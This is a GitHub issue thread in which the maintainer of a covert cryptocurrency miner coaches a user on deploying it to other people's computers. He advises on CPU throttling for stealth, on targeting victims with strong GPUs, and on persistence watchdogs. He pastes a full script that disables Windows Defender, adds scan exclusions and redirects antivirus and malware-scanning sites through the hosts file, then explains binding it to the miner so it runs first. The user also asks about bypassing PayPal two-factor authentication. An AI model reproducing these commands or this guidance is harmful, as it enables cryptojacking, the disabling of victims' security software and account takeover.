### ISSUE TITLE
Issue

### ISSUE THREAD

**Issue by Milk8** [UnamSanctam/SilentXMRMiner#192]
Hey its me again we spoke yesterday, I have gotten everything working and everything seems to be as they should, in nanopool the minimum payout is like 0.1 eth or 1 xmr and I want to lower that, to lower it I need a "password" in the settings tab, what would that password be or how do I set it?

**Comment by UnamSanctam** [comment]
You can check what I've written here https://github.com/UnamSanctam/SilentXMRMiner/wiki#wallet-addressuser and here https://github.com/UnamSanctam/SilentXMRMiner/issues/184

**Comment by Milk8** [comment]
I am trying to do the thing you said in the wiki, what email am I supposed to put in? Just any one? it keeps saying password is incorrect

**Comment by UnamSanctam** [comment]
Yes use any email when mining and then when it has reached 10 rating/shares you should be able to use it as a password on nanopool.

**Comment by Milk8** [comment]
Do I have to use an email? I just simply put my wallet address in on the builder when I built this file

**Comment by Milk8** [comment]
But its still saying incorrect with the wallet address

**Comment by UnamSanctam** [comment]
Read what I answered in this issue https://github.com/UnamSanctam/SilentXMRMiner/issues/184

**Comment by Milk8** [comment]
Alright, so if I get the password using the test build that nobody else is using then I can control the minimum withdraw amount for the normal build on that address I had before?

**Comment by UnamSanctam** [comment]
Yes exactly.

**Comment by Milk8** [comment]
Alright pretty sure I understand, how long does a usual "10 shares" take?

**Comment by Milk8** [comment]
Also I accidently deleted the old compiled eth miner, which source file should i debug in order to get the compiled version ?

**Comment by UnamSanctam** [comment]
Depends on the CPU but usually 10-30 minutes or less.

What do you mean by your second question?

**Comment by Milk8** [comment]
Nevermind, I find the pre compiled version so im good on that, I should be good if that all works.
Thanks

**Comment by Milk8** [comment]
Alright so I have been mining for about an hour and a half trying to do that, the xmr pool did register the net person but it is still saying incorrect password if I try to enter the email I had put on the miner. For ethereum the person did not pop up at all and the miner is using my gpu but on the pool it shows nothing after an hour of it.

**Comment by Milk8** [comment]
I did eth wallet.email@yahoo.com     as the wallet on the builder and that email is not working as password even for the xmr

**Comment by Milk8** [comment]
Also does the pool matter if im using us or eu? could the problem be that originally I was mining on us and accidently switched to eu?

**Comment by UnamSanctam** [comment]
It should be wallet.worker/email@yahoo.com for XMR miner. And it should be worker/email%40yahoo.com (in the 'Extra data' field, leave the worker name field empty) for the ETH miner.

And no, the server location won't matter.

**Comment by Milk8** [comment]
Ok so that was the problem for the eth miner then, so for eth would test%40@yahoo.com be how it should be?
then for xmr: Address.test@yahoo.com?

**Comment by Milk8** [comment]
That was the problem for eth but idk what was wrong with xmr then, it registered as a user but the password wont work

**Comment by UnamSanctam** [comment]
Yes but you need the worker name as well like I wrote it above. The email and worker name are separate.

**Comment by Milk8** [comment]
Ah I thought it meant you could use eathier or so: bot/test%40@yahoo.com  for eth
and: wallet.bot/test@yahoo.com

**Comment by UnamSanctam** [comment]
Yes exactly

**Comment by Milk8** [comment]
wait for eth should I include the @ or no? In your example you didnt use the @ before the email like I just did

**Comment by UnamSanctam** [comment]
Ah yes sorry, didn't see it . Don't use the @, the email has to be URL encoded which is why we replace the @ with %40 instead.

**Comment by Milk8** [comment]
But for the xmr one I can use the @?

**Comment by Milk8** [comment]
or that has to be %40 aswell

**Comment by UnamSanctam** [comment]
No for XMR you can use the @.

**Comment by Milk8** [comment]
Alright so those were both the issues then, im trying to close the old miners which I already deleted(I did not have any settings on for them other than cpu mining for monero obviously) and the eth miner is taking up my gpu in task manager under radeon graphics or something and every time I close it, it just comes back on, what do I do?

**Comment by Milk8** [comment]
Antivirus not picking anything up eathier

**Comment by UnamSanctam** [comment]
First check if any of the watchdogs are running: 'sihost64.exe' or 'sihost32.exe', and otherwise do all the things here: https://github.com/UnamSanctam/SilentXMRMiner/wiki#how-do-i-remove-the-miner to see if there are any remnants left.

**Comment by Milk8** [comment]
I found sihost.exe but nothing else

**Comment by UnamSanctam** [comment]
Well then it shouldn't be able to start it again. Make sure that all of the miner processes are shut down, you can use Process Hacker and search for `--url` in the top right to find the XMR miner and `--pool` for the ETH miners.

**Comment by Milk8** [comment]
none of those showed up

**Comment by Milk8** [comment]
lmao

**Comment by Milk8** [comment]
Its just radeon settings: Host Service running in task manager sticking at 75% GPU, if I close it it reopens

**Comment by UnamSanctam** [comment]
Aha

**Comment by Milk8** [comment]
Ok I see I accidently has watchdog enabled some how, it was on explorer.exe aswell, where would the watchdog be?

**Comment by UnamSanctam** [comment]
The location of the watchdog? It should be in the %AppData%\Microsoft\Libs or %AppData%\Microsoft\inc folders.

**Comment by Milk8** [comment]
app data as in C users appdata?

**Comment by UnamSanctam** [comment]
Yes C:\Users\User\AppData\Roaming, you can also get there by opening run (Windows key + R) and entering %AppData%.

**Comment by Milk8** [comment]
Nothing was in inc, and there was no libs folder

**Comment by UnamSanctam** [comment]
Inside the Microsoft folder inside Roaming?

**Comment by Milk8** [comment]
Ok, I did a google search and right away there were videos talking about how to fix 75% problem on that proccess, I had to go into radeon settings and turn "instant replay" off and now its perfectly back to normal. So idk what the fuck that was about or if it was just a coincidence, so seems like that problems fixed ill start testing the new builds with the right names now

**Comment by Milk8** [comment]
Everythings working but it seems to be mining very slow, what will an average user mine a day? For xmr and eth? Assuming he has a 1060 and a i5 or some average shit? Just a rough estimate

**Comment by UnamSanctam** [comment]
For the XMR it depends on which i5 and how much CPU you use but at 20% it's at like $0.05-$0.1/day and for ETH with a 1060 6GB (6GB since it needs to store the DAG size) it would be like $2,5/day. Keep in mind that lets say that you mine 4 XMR and then the Monero price triples then the $/day will be higher in retrospect.

**Comment by Milk8** [comment]
Alright that seems about right, so ethereum mining is best and targeting good gpus/pcs is better over quanity since xmr dosent give a ton

**Comment by UnamSanctam** [comment]
Yes exactly, but XMR CPU mining is usually a lot more discreet, long lasting and reliable which is why it's big. But using both at the same time is the best solution of course.

**Comment by Milk8** [comment]
If its meant to be discreet how high you think I should be putting cpu usage while active? 20-40%?

**Comment by UnamSanctam** [comment]
Yes usually between 20-40%, it depends if you want to prioritize stealth or profit but usually they are quite similar.

**Comment by Milk8** [comment]
Alright and whats ethereums default at since I cant select it?

**Comment by Milk8** [comment]
Oh and what happens if the person tries to download the miner multiple times? Will the first or last version work?

**Comment by UnamSanctam** [comment]
GPU mining works a bit differently, it uses the required amount of GPU Memory (VRAM) to mine the coin and then uses the memory clock to calculate everything so there isn't a percentage per say. I am planning on adding a sleep between cycles in the next version to make it be able to draw less power but it's not really the same as changing CPU mining.

If they run it multiple times it will just overwrite the old one and run that one (after restart, before restart it will use the old one since it doesn't close it down).

**Comment by Milk8** [comment]
Alright so now going with the test build to get the password to pool thing, eth miner is just not working, gpu is being used like 2% in task manger and i dont have idle or stealth on. (This is with the new build for the password thing, before it seemed to be working). For xmr the person has came up as a user on the panel with the test name I put. But when I try entering the email as the password just says incorrect

**Comment by UnamSanctam** [comment]
Don't know what you're checking in Task Manager but you can't see if it's mining or not by looking at GPU load since it doesn't nor should it use any. To see if it's mining or not use something like Process Hacker and double click the mining process and check the GPU Memory, if it's using as much as the DAG size is (Ethereum around 4.2 GB) then it's mining correctly.

What rating does the XMR one have?

**Comment by Milk8** [comment]
XMR has a rating of 32 rn, ah I thought I could see it in task manager usage, ill look in process hacker now

**Comment by Milk8** [comment]
I have svchost as the eth one but theres like 20 of them obviously, how should I find the miner within them?

**Comment by UnamSanctam** [comment]
Search for --pool in the top right

**Comment by Milk8** [comment]
that gave no process

**Comment by Milk8** [comment]
ive ran several build files several times

**Comment by UnamSanctam** [comment]
Well searching for `--pool` should bring up all the ETH miners, make sure that all settings are correct since the miner will close down if they aren't.

**Comment by Milk8** [comment]
Is this all right? https://imgur.com/S0KU1tr   nothing else is chosen other than this

**Comment by UnamSanctam** [comment]
Hmm yeah that looks right, if you search for `--pool` and have Process Hacker open while you start the miner you should see if it pops up quickly in the list or not. What GPU did you have again?

**Comment by Milk8** [comment]
On there its a Radeon RX 580

**Comment by UnamSanctam** [comment]
Hmm, there have been a report of there being something different in the new AMD drivers causing it to not find OpenCL, maybe that's why it closes down.

**Comment by Milk8** [comment]
ill try updating them

**Comment by Milk8** [comment]
that did nothing

**Comment by UnamSanctam** [comment]
Yeah I think maybe the new updates are what makes it stop working. I don't have any AMD but people have told me that it's working for them but maybe they have an old version, I also believe it might be that they had an old driver version before and then updated it so that it works.

Can you try these instructions that I found in another issue on another repo if you have the time and will to do it?
> "HKEY_LOCAL_MACHINE\SOFTWARE\Khronos\OpenCL\Vendors".
> 
> Solution for AMD Radeon GPUs not showing up:
> 
> Go to C:\Windows\System32\ and search for amdocl64.dll for OpenCL 2.1, x86_64. (There are also amdocl.dll for OpenCL 2.1, x86; amdocl12cl.dll for OpenCL 1.2, x86; and amdocl12cl64.dll for OpenCL 1.2, x86_64.)
> 
> Look for the most recent file, right-click, click "Properties," and then select and copy the file's Location (which is the path to its directory). (Mine was in a subdirectory of C:\Windows\System32\DriverStore\FileRepository)
> 
> Open regedit, aka the Registry Editor, (e.g. via Windows key+r, and entering regedit)
> 
> Navigate to HKEY_LOCAL_MACHINE\SOFTWARE\Khronos\OpenCL\Vendors
> 
> Create a new DWORD with the Name being the path from step 2 with \amdocl64.dll at the end (or whichever dll version you need or want), and leave the key's data at 0. My key's Name, for example, is C:\Windows\System32\DriverStore\FileRepository\u0336248.inf_amd64_107cc52c701c83d0\B336252\amdocl64.dll
> 
> should now see AMD GPUs!

Since if that works it means I have to change the dependencies or something, not sure.

**Comment by Milk8** [comment]
"Navigate to HKEY_LOCAL_MACHINE\SOFTWARE\Khronos\OpenCL\Vendors"
After khronos theres no open cl

**Comment by Milk8** [comment]
Like after I click the drop down on khronos it only shows vulkan and no openCL

**Comment by UnamSanctam** [comment]
Yes you would have to create it, seems like that is the problem then. Seems like the new drivers don't create that key anymore. That key is what it checks to see if OpenCL exists.

**Comment by Milk8** [comment]
So make a new file called OpenCL?

**Comment by Milk8** [comment]
And should it be a key type?

**Comment by UnamSanctam** [comment]
Yes in regedit right-click the key on the left side and add a new key.

**Comment by Milk8** [comment]
Alright, should I create the vendors folder too or no?

**Comment by UnamSanctam** [comment]
Yes exactly and then inside that folder create a DWORD in the right side box.

**Comment by Milk8** [comment]
Vendors should be a key I assume?

**Comment by UnamSanctam** [comment]
Yes

**Comment by Milk8** [comment]
And wym by the right side box? Just in the folder?

**Comment by UnamSanctam** [comment]
Yeah exactly

**Comment by Milk8** [comment]
Its not letting me change the name on it just dosent do anything if I type into the name box

**Comment by Milk8** [comment]
nvm I got it

**Comment by Milk8** [comment]
Alright I got that done. Start the miner now?

**Comment by UnamSanctam** [comment]
Yeah if you added the .dll to a DWORD key and everything then that's all.

**Comment by Milk8** [comment]
I ran the eth miner, nothing still comes up for --pool in proc manager

**Comment by UnamSanctam** [comment]
Can you try and download https://github.com/ethereum-mining/ethminer/releases and try to start it and see if that works for you?

**Comment by Milk8** [comment]
Which cuda version should I download? Theres 3 for amd windows or does it not matter

**Comment by Milk8** [comment]
I downloaded 10.0  and ran the exe inside

**Comment by UnamSanctam** [comment]
Try the latest one but it shouldn't matter.

**Comment by Milk8** [comment]
It opens for a split second then insta closes

**Comment by UnamSanctam** [comment]
Create a .bat file in the same folder containing
```
ethminer --pool stratum://YOUR_WALLET_ADDRESS@eth-eu2.nanopool.org:9999
pause
```
And try running it.

**Comment by Milk8** [comment]
So
"ethminer --pool stratum://0x0e5dA@eth-eu2.nanopool.org:9999 
pause"
Then that as bat file?
the 0x0 meaning my address

**Comment by Milk8** [comment]
alright i did that

**Comment by Milk8** [comment]
Ok its saying a bunch of stuff

**Comment by Milk8** [comment]
ethminer 0.18.0
Build: windows/release/msvc

CUDA Error : No CUDA driver found
 i 09:48:40 main     Configured pool eth-eu2.nanopool.org:9999
 i 09:48:40 <unknown> Selected pool eth-eu2.nanopool.org:9999
 X 09:48:41 <unknown> Error  51.15.55.162:9999 [ The I/O operation has been aborted because of either a thread exit or an application request ]
 i 09:48:41 <unknown> Connection remotely closed by eth-eu2.nanopool.org
 i 09:48:41 <unknown> Stratum mode : EthereumStratum/1.0.0 (NiceHash)
 i 09:48:41 <unknown> Established connection to eth-eu2.nanopool.org [151.80.144.188:9999]
 i 09:48:41 <unknown> Spinning up miners...
cl 09:48:41 cl-0     Using PciId : 29:00.0 Ellesmere OpenCL 2.0 AMD-APP (3240.6) Memory : 4.00 GB
 i 09:48:41 <unknown> Extranonce set to 0f43
 i 09:48:41 <unknown> Authorized worker 0x0e5dA4082ad1783D1ff9b92224C71b12dE33732B
 i 09:48:41 <unknown> Epoch : 409 Difficulty : 10.00 Gh
 i 09:48:41 <unknown> Job: c223da3f... eth-eu2.nanopool.org [151.80.144.188:9999]
 i 09:48:47 <unknown> Job: c2eff60d... eth-eu2.nanopool.org [151.80.144.188:9999]
cl 09:48:47 cl-0     Epoch 409 requires 4.26 GB memory. Only 4.00 GB available on device.
 m 09:48:47 <unknown> 0:00 A0 0.00 h - cl0 0.00
 i 09:49:01 <unknown> Job: 31c9cd44... eth-eu2.nanopool.org [151.80.144.188:9999]
 i 09:49:01 <unknown> Job: 6499bfa9... eth-eu2.nanopool.org [151.80.144.188:9999]
 m 09:49:01 <unknown> 0:00 A0 0.00 h - cl0 0.00
 i 09:49:01 <unknown> Job: 0c29be79... eth-eu2.nanopool.org [151.80.144.188:9999]

**Comment by UnamSanctam** [comment]
Oh ok, that means that the miner should be working.

**Comment by Milk8** [comment]
This dosent mean anything? "Epoch 409 requires 4.26 GB memory. Only 4.00 GB available on device."

**Comment by UnamSanctam** [comment]
Oh, do you only have a 4GB card?

**Comment by UnamSanctam** [comment]
I thought the Radeon RX 580 only existed as a 6GB and 8GB card but it seems like 4GB ones exist as well.

**Comment by Milk8** [comment]
I guess so yea and they exist, thats the problem then?

**Comment by UnamSanctam** [comment]
Yeah, I still think you should be able to find it in Process Hacker but it won't be able to mine Ethereum at least.

**Comment by Milk8** [comment]
alr and what about the xmr password issue? it keeps saying incorrect while im using the same one

**Comment by Milk8** [comment]
My pc has popped up on the dashboard

**Comment by Milk8** [comment]
so ik its working

**Comment by UnamSanctam** [comment]
Hmm, from another issue here: https://github.com/UnamSanctam/SilentETHMiner/issues/39 we theorized that on Nanopool it might have to do with if you have any other workers active and those might block it since they don't have the same email (even though they have none it might count them). When I've changed the minimum payout with the password I've never had any active workers (only miners without a worker name) so it has always worked for me because of that.

**Comment by Milk8** [comment]
So try and stop mining maybe?

**Comment by Milk8** [comment]
I only have the 1 worker actively mining that has popped up

**Comment by UnamSanctam** [comment]
Only the one with the email? Or a separate one?

**Comment by Milk8** [comment]
only the one w the email

**Comment by UnamSanctam** [comment]
Interesting, can you send the miner .exe here so I can check the connection?

**Comment by Milk8** [comment]
I ended the task and tried and it worked

**Comment by Milk8** [comment]
So thats fixed, now I just need to find somebody with a good gpu to do eth for me

**Comment by UnamSanctam** [comment]
Yeah, I might be able to do it later but I don't have a good computer available at the moment.

**Comment by Milk8** [comment]
Alright lmk

**Comment by Milk8** [comment]
I’m thinking of buying a paid silent miner that works the same as yours and wanted to ask if you thought it was worth it or if yours is basically the same thing. It has basically all the same features, though it is mining eth classic? I’m comparing this to your eth miner mostly
He’s charging $120 for it and supposedly some really good spreading methods. 
I know for a fact it is not a scam and legit
When I ask him how it’s different or better than yours/the free one, he says you cannot mine ethereum with less than 4gb cards? And he says he dosent think yours has defender killer
How is in cpp and has default about the same detection as yours

Was just asking to see if you thought it was worth it and those things are important features in your experience 

The issues I had before I got all fixed and it’s been working fine though

**Comment by UnamSanctam** [comment]
Well technically mine supports ETC (Ethereum Classic) as well but it seems to be bugged at the moment and I'm fixing it in the next release. And well neither ETH or ETC can be mined with less than 4 GB cards, zombie mining is basically dead so that can't be it and ETC requires a bigger DAG size than ETH but he might be doing something else.

Mine doesn't have defender killer since from personal experience it's better to just make a .bat file with all the commands that "kill" it and then bind it so that it starts before the miner preferably, or you can technically also just add it into the source. The best thing of course would to use a RAT that then is used to upload and start the miner.

My miner is also in C++ but the injector is in C# since it's more modular (not all featured have to be added into the code when built) unless you use some sort of "portable" C++ compiler. My Ethash miner is only like 1.5 months old so not all features I would like has been added yet but I'm planning on adding things in the next version like remote config support (gets connection string from online at startup), automatic miner update (meaning that the actual miner and not the injector will be updated so that you don't have to do anything),
changable Idle/normal power usage (mostly only to be able to reduce fan sounds because memory clock usage goes down although of course hashrate will go down), fixing ETC and fixing a bug with the new AMD drivers.

You can use the other one if you feel like it's a worthwhile investment since it might be older and thus most bugs may be fixed and the since his cost money he might've been able to invest more time into it. Though it's hard to know exactly how much they differ since his isn't free so testing it isn't possible.

**Comment by Milk8** [comment]
Alright, ill probably stick with yours for now, any chance you have the commands that kill defender that you could paste in here and ill make a bat out of them and bind it to the miner?  or anywhere that would have them?
Also, since your experienced with this shit and 90% of stuff off google wont work, you know any good ways/guides on bypassing 2fa?

**Comment by UnamSanctam** [comment]
I think these are all the commands I have:
```
powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%'
powershell -Command Add-MpPreference -ExclusionPath '%AppData%'
powershell -Command Add-MpPreference -ExclusionPath '%Temp%'
powershell -Command Set-MpPreference -DisableArchiveScanning $true
powershell -Command Set-MpPreference -DisableBehaviorMonitoring $true
powershell -Command Set-MpPreference -DisableRealtimeMonitoring $true
powershell -Command Set-MpPreference -DisableScriptScanning $true
powershell -Command Set-MpPreference -DisableIntrusionPreventionSystem $true
powershell -Command Set-MpPreference -DisableIOAVProtection $true
powershell -Command Set-MpPreference -EnableControlledFolderAccess Disabled
powershell -Command Set-MpPreference -EnableNetworkProtection AuditMode -Force
powershell -Command Set-MpPreference -MAPSReporting Disabled
powershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend
powershell New-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender' -Name DisableAntiSpyware -Value 1 -PropertyType DWORD -Force
sc config WinDefend start=disabled
sc stop WinDefend
powershell -Command Stop-Service WinDefend 
powershell -Command Set-Service WinDefend -StartupType Disabled
powershell -Command Uninstall-WindowsFeature -Name Windows-Defender
powershell -Command Remove-WindowsFeature Windows-Defender, Windows-Defender-GUI
Dism /online /Disable-Feature /FeatureName:Windows-Defender /Remove /NoRestart /quiet
echo 127.0.0.1       www.malwarebytes.com >> "%SystemRoot%\System32\drivers\etc\hosts"
echo 127.0.0.1       malwarebytes.com >> "%SystemRoot%\System32\drivers\etc\hosts"
echo 127.0.0.1       avast.com >> "%SystemRoot%\System32\drivers\etc\hosts"
echo 127.0.0.1       www.avast.com >> "%SystemRoot%\System32\drivers\etc\hosts"
echo 127.0.0.1       www.mcafee.com >> "%SystemRoot%\System32\drivers\etc\hosts"
echo 127.0.0.1       mcafee.com >> "%SystemRoot%\System32\drivers\etc\hosts"
echo 127.0.0.1       www.kaspersky.com >> "%SystemRoot%\System32\drivers\etc\hosts"
echo 127.0.0.1       kaspersky.com >> "%SystemRoot%\System32\drivers\etc\hosts"
echo 127.0.0.1       www.norton.com >> "%SystemRoot%\System32\drivers\etc\hosts"
echo 127.0.0.1       norton.com >> "%SystemRoot%\System32\drivers\etc\hosts"
echo 127.0.0.1       microsoft.com >> "%SystemRoot%\System32\drivers\etc\hosts"
echo 127.0.0.1       www.microsoft.com >> "%SystemRoot%\System32\drivers\etc\hosts"
echo 127.0.0.1       any.run >> "%SystemRoot%\System32\drivers\etc\hosts"
echo 127.0.0.1       www.any.run >> "%SystemRoot%\System32\drivers\etc\hosts"
echo 127.0.0.1       virustotal.com >> "%SystemRoot%\System32\drivers\etc\hosts"
echo 127.0.0.1       www.virustotal.com >> "%SystemRoot%\System32\drivers\etc\hosts"
```
And it depends on what 2FA, if it's the 2FA of a website then you can't really bypass it.

**Comment by Milk8** [comment]
Alright thanks and idk PayPal or something, I’ve seen people saying they have methods to bypassing it but I can’t find any or any that work
I’d use a rat but my internet is fucked and just asks me to reset my password every time I try and login to the dashboard/settings panel thing so I can’t port forward
Just paste that into notepad, create a batch file and bind it with my current executable? Do I have to do something so it runs first or some shit or no

**Comment by UnamSanctam** [comment]
Well most bypasses are just that the website messed up their process so you can skip a step etc, and depends on the website.

And yes just paste that into a bat file an bind it. It depends on what binder but some allows you to choose the order of execution, make them drop/execute synchronously so you can but the batch file at the top or something else.

**Comment by Milk8** [comment]
So would I want a binder that can chose order of execution to make it be a use? im using lime binder by nyan cat and dont think it has that

**Comment by Milk8** [comment]
Also would the user need to run it as admin for it too work? I tried running the bat as admin and just said it dosent have the permission to do this a bunch of times

**Comment by UnamSanctam** [comment]
Well it should be fine anyway it's just that if you can choose the order then it will "kill" Windows Defender before it drops the miner so then it wouldn't matter if the miner is detected but if it just drops both and the miner is detected it could remove it before it gets "killed".

**Comment by Milk8** [comment]
So I would then need it to execute first for it to be a use? Since thats my goal for it to bypass windows av and the miner/executable to be downloaded
Can you name any binders off top of your head that has that or no

**Comment by UnamSanctam** [comment]
Yes most commands would need administrator rights. I don't really keep track of the file binders that exist anymore so I'm not even sure which ones are still popular.

**Comment by Milk8** [comment]
Alright well ill be searching for one that can make the bat file run first, if you come across one lmk, Would it be possible to add a function to the source and call it first (with cpp) to kill windows defender with those commands? Not positive how I would do it exactly using cpp and not powershell or whatever you were using in the paste a few messeges ago though

**Comment by Milk8** [comment]
Or could I call a powershell script within the cpp application or some shit

**Comment by Milk8** [comment]
Nyan cat has a bunch of windows av bypass sources but wouldnt they still need to be ran before the main executable?

**Comment by UnamSanctam** [comment]
You can call powershell scripts and all that before using C++ but that would have to be added to the binder and not the miner since if it's added to the miner source it wouldn't matter if it's run as a bound .bat instead. The NYAN-CAT Windows Defender bypasses I believe are pretty much the same as the commands I sent you and yes it would still have to be run first. After looking through the source I believe this executes them in order https://github.com/Paskowsky/Dream-AIO.

**Comment by Milk8** [comment]
Alright ive debugged that and got it running but how the fuck am I supposed to add files to it to bind/ I cant drag them in and no box to type or browse files

**Comment by UnamSanctam** [comment]
Right click?

**Comment by Milk8** [comment]
Ive got it debugged but how am I supposed to put files into it to bind, I cant drag, paste, and theres no box to browse files

**Comment by Milk8** [comment]
oh sorry didnt see that msg 1 sec ill try

**Comment by Milk8** [comment]
Alright yea that was the problem im on a macbook with windows on it and it wont let me right click or scroll so its not my first thing to try, is your bat file the same or better than nyans you think? its more ud I assume

**Comment by UnamSanctam** [comment]
From what I see in the code it will execute them in the order you put them in, so the program at the top will execute first. NYAN-CATs script should be similar to mine but I'm pretty sure mine contains some more commands.

**Comment by Milk8** [comment]
So the one I put in first will execute last? or vise versa

**Comment by Milk8** [comment]
And then it says "drop options" and folders to drop it too, Should I worry about that? or is that useless because the miner is already dropping or going to the folder I want and everything else is just things that need to be ran once and they dont matter from then on

**Comment by UnamSanctam** [comment]
The one you put in first will execute first I believe, you can test it by creating two .bat files that each display a message and you would see which message comes up first.

You can probably leave the drop options as they are if you add an exclusion path command to the current folder as well  or choose a drop folder like Temp or AppData.

**Comment by Milk8** [comment]
What would I put in notepad for it to display what I type? it just opens for a milisecond and closes normally just making words a bat file in notepad

**Comment by UnamSanctam** [comment]
`pause` in the last line but you could maybe use something like:
`PowerShell -Command "Add-Type -AssemblyName PresentationFramework;[System.Windows.MessageBox]::Show('MESSAGE HERE')"`
to show a textbox.

**Comment by Milk8** [comment]
Alright I got it
